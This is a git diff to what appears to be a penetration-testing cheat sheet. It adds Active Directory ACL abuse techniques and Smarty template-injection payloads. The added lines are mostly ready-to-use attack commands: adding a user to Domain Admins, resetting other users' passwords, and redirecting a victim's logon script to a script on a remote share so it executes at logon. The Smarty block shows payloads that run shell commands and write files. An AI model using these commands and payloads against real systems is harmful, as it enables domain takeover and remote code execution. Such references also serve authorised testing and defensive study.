diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 708add14..e7a3252c 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -44,6 +44,7 @@ - [Drop the MIC](#drop-the-mic) - [Ghost Potato - CVE-2019-1384](#ghost-potato---cve-2019-1384) - [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage) + - [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-acls-aces) - [Trust relationship between domains](#trust-relationship-between-domains) - [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking) - [Unconstrained delegation](#unconstrained-delegation) @@ -985,6 +986,15 @@ or ([adsisearcher]"(AdminCount=1)").findall() ``` +### Abusing Active Directory ACLs/ACEs + +* **GenericAll on User** : We can reset user's password without knowing the current password +* **GenericAll on Group** : Effectively, this allows us to add ourselves (the user spotless) to the Domain Admin group : `net group "domain admins" spotless /add /domain` +* **WriteProperty on Group** : We can again add ourselves to the Domain Admins group and escalate privileges: `net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"; net user spotless /domain` +* **Self (Self-Membership) on Group** : Another privilege that enables the attacker adding themselves to a group +* **ForceChangePassword** : we can reset the user's password without knowing their current password: `$c = Get-Credential;Set-DomainUserPassword -Identity changeme -AccountPassword $c.Password -Verbose` +* **GenericWrite on User** : WriteProperty on an ObjectType, which in this particular case is Script-Path, allows the attacker to overwrite the logon script path of the delegate user, which means that the next time, when the user delegate logs on, their system will execute our malicious script : `Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\\10.0.0.5\totallyLegitScript.ps1` + ### Trust relationship between domains ```powershell diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index d8101f9e..9e6fa845 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -153,6 +153,7 @@ $output = $twig > render ( ## Smarty ```python +{$smarty.version} {php}echo `id`;{/php} {Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"",self::clearConfig())} ```